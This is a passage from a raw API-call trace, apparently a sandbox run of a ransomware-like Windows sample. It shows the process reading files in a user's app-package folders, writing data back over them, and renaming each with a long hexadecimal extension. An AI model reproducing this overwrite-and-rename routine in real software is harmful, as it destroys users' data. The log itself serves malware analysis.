ReturnLength=0x25fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x25fff70) returned 0x0 [0115.169] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".117AE8D8CD869FFB411BA5BE5FE868F1D58F1653822BA88054B4B0237E0A700C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Settings\\settings.dat.117AE8D8CD869FFB411BA5BE5FE868F1D58F1653822BA88054B4B0237E0A700C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Settings\\settings.dat.117AE8D8CD869FFB411BA5BE5FE868F1D58F1653822BA88054B4B0237E0A700C" [0115.169] GetProcessHeap () returned 0x600000 [0115.169] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18a) returned 0x318edd8 [0115.169] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x25fff60, FileInformation=0x318edd8, Length=0x18a, FileInformationClass=0xa) returned 0x0 [0115.179] CloseHandle (hObject=0x320) returned 1 [0115.180] GetProcessHeap () returned 0x600000 [0115.180] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.182] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.279] ReadFile (in: hFile=0x32c, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0115.280] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.288] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0115.288] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".A9EBE3782D0862D6DDB42A3723059529FBDB7BC0B79C491427D220DF37F9BA49" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.A9EBE3782D0862D6DDB42A3723059529FBDB7BC0B79C491427D220DF37F9BA49") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.A9EBE3782D0862D6DDB42A3723059529FBDB7BC0B79C491427D220DF37F9BA49" [0115.289] GetProcessHeap () returned 0x600000 [0115.289] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x200) returned 0x6b39a8 [0115.289] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x25fff60, FileInformation=0x6b39a8, Length=0x200, FileInformationClass=0xa) returned 0x0 [0115.290] CloseHandle (hObject=0x32c) returned 1 [0115.291] GetProcessHeap () returned 0x600000 [0115.291] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0115.293] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.409] ReadFile (in: hFile=0x324, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0115.409] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.409] WriteFile (in: hFile=0x324, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0115.412] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.412] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x25fff70) returned 0x0 [0115.412] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".0FA3DF231632741903C0DEA9704B4A0494A0A9B6EDF2A9B702359A963095D605" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Settings\\settings.dat.0FA3DF231632741903C0DEA9704B4A0494A0A9B6EDF2A9B702359A963095D605") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Settings\\settings.dat.0FA3DF231632741903C0DEA9704B4A0494A0A9B6EDF2A9B702359A963095D605" [0115.412] GetProcessHeap () returned 0x600000 [0115.412] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x188) returned 0x318e5e0 [0115.413] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x25fff60, FileInformation=0x318e5e0, Length=0x188, FileInformationClass=0xa) returned 0x0 [0115.416] CloseHandle (hObject=0x324) returned 1 [0115.416] GetProcessHeap () returned 0x600000 [0115.416] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.417] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.485] ReadFile (in: hFile=0x214, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0115.486] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.493] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0115.493] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".1C66EA1821CC66AB276E1B82E13B707741D182412F2DC967653C84C10B838400" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.1C66EA1821CC66AB276E1B82E13B707741D182412F2DC967653C84C10B838400") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.1C66EA1821CC66AB276E1B82E13B707741D182412F2DC967653C84C10B838400" [0115.493] GetProcessHeap () returned 0x600000 [0115.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x20c) returned 0x6b3bb0 [0115.493] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x25fff60, FileInformation=0x6b3bb0, Length=0x20c, FileInformationClass=0xa) returned 0x0 [0115.495] CloseHandle (hObject=0x214) returned 1 [0115.495] GetProcessHeap () returned 0x600000 [0115.495] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0115.496] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.816] WriteFile (in: hFile=0x214, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0115.817] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.818] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x25fff70) returned 0x0 [0115.818] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".8B568C23B51222C56DFBAE3F65F5CE4B6C8A0690BDBE2DC42EC7B5FEB5AE1635" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Settings\\settings.dat.8B568C23B51222C56DFBAE3F65F5CE4B6C8A0690BDBE2DC42EC7B5FEB5AE1635") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Settings\\settings.dat.8B568C23B51222C56DFBAE3F65F5CE4B6C8A0690BDBE2DC42EC7B5FEB5AE1635" [0115.818] GetProcessHeap () returned 0x600000 [0115.819] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x196) returned 0x3162218 [0115.819] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x25fff60, FileInformation=0x3162218, Length=0x196, FileInformationClass=0xa) returned 0x0 [0115.828] CloseHandle (hObject=0x214) returned 1 [0115.828] GetProcessHeap () returned 0x600000 [0115.828] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.829] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.901] ReadFile (in: hFile=0x32c, lpBuffer=0x690478, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0115.901] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.905] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0115.906] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".D3EE41991F781FC445C86047E43B289A1F1C4888AC4A44023D32F6C8ED3E412D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.D3EE41991F781FC445C86047E43B289A1F1C4888AC4A44023D32F6C8ED3E412D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.D3EE41991F781FC445C86047E43B289A1F1C4888AC4A44023D32F6C8ED3E412D" [0115.906] GetProcessHeap () returned 0x600000 [0115.906] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x204) returned 0x63eb68 [0115.906] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x25fff60, FileInformation=0x63eb68, Length=0x204, FileInformationClass=0xa) returned 0x0 [0115.907] CloseHandle (hObject=0x32c) returned 1 [0115.908] GetProcessHeap () returned 0x600000 [0115.908] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0115.910] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.928] ReadFile (in: hFile=0x32c, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0115.929] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.929] WriteFile (in: hFile=0x32c, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0115.930] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.931] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x25fff70) returned 0x0 [0115.931] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".B2CE609F6E548F9AB4EEF72C4D15D73B09FFA61BD840421F4C3D60ACFD1A9439" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Settings\\settings.dat.B2CE609F6E548F9AB4EEF72C4D15D73B09FFA61BD840421F4C3D60ACFD1A9439") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Settings\\settings.dat.B2CE609F6E548F9AB4EEF72C4D15D73B09FFA61BD840421F4C3D60ACFD1A9439" [0115.932] GetProcessHeap () returned 0x600000 [0115.932] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x188) returned 0x6b1c78 [0115.932] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x25fff60, FileInformation=0x6b1c78, Length=0x188, FileInformationClass=0xa) returned 0x0 [0115.933] CloseHandle (hObject=0x32c) returned 1 [0115.934] GetProcessHeap () returned 0x600000 [0115.934] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.934] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0116.021] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0116.021] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0116.039] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0116.040] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat", lpString2=".220BAE04E76EAAEF99821F92B0DFF3F5C4C3F27E263CCAAF6BC517ED432C4668" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.220BAE04E76EAAEF99821F92B0DFF3F5C4C3F27E263CCAAF6BC517ED432C4668") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Microsoft.LockApp_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.220BAE04E76EAAEF99821F92B0DFF3F5C4C3F27E263CCAAF6BC517ED432C4668" [0116.040] GetProcessHeap () returned 0x600000 [0116.040] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x20a) returned 0x31625e8 [0116.040] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x25fff60, FileInformation=0x31625e8, Length=0x20a, FileInformationClass=0xa) returned 0x0 [0116.041] CloseHandle (hObject=0x320) returned 1 [0116.042] GetProcessHeap () returned 0x600000 [0116.042] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0116.044] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0116.064] ReadFile (in: hFile=0x320, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0116.064] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0116.064] WriteFile (in: hFile=0x320, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0116.065] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0116.066] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x25fff70) returned 0x0 [0116.066] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings\\settings.dat", lpString2=".355DC7D6EF6F0EC2D4D8159A459501C9AF70071D61D5A25170FC31E49A71841A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings\\settings.dat.355DC7D6EF6F0EC2D4D8159A459501C9AF70071D61D5A25170FC31E49A71841A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings\\settings.dat.355DC7D6EF6F0EC2D4D8159A459501C9AF70071D61D5A25170FC31E49A71841A" [0116.066] GetProcessHeap () returned 0x600000 [0116.066] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x182) returned 0x6b2ad0 [0116.066] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x25fff60, FileInformation=0x6b2ad0, Length=0x182, FileInformationClass=0xa) returned 0x0 [0116.067] CloseHandle (hObject=0x320) returned 1 [0116.068] GetProcessHeap () returned 0x600000 [0116.068] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.069] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0116.080] ReadFile (in: hFile=0x31c, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0116.080] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0116.080] WriteFile (in: hFile=0x31c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0116.081] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0116.081] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0116.082] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\FAXM6P1O\\15_10.0.0[1].json", lpString2=".2EAA543EE8F5BE480502DB3A7A918A57F041782197655B3A90FEBA18A1D2802A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\FAXM6P1O\\15_10.0.0[1].json.2EAA543EE8F5BE480502DB3A7A918A57F041782197655B3A90FEBA18A1D2802A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\FAXM6P1O\\15_10.0.0[1].json.2EAA543EE8F5BE480502DB3A7A918A57F041782197655B3A90FEBA18A1D2802A" [0116.082] GetProcessHeap () returned 0x600000 [0116.082] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1aa) returned 0x3162800 [0116.082] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x25fff60, FileInformation=0x3162800, Length=0x1aa, FileInformationClass=0xa) returned 0x0 [0116.083] CloseHandle (hObject=0x31c) returned 1 [0116.083] GetProcessHeap () returned 0x600000 [0116.083] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0116.084] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0116.094] ReadFile (in: hFile=0x324, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0116.094] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0116.095] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0116.096] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\TCKLQR58\\15_10.0.0[1].json", lpString2=".38566CACE4363A34304D3295DD3DAE9871EB1D9C225868F7FE23422CD477F27F" | out: 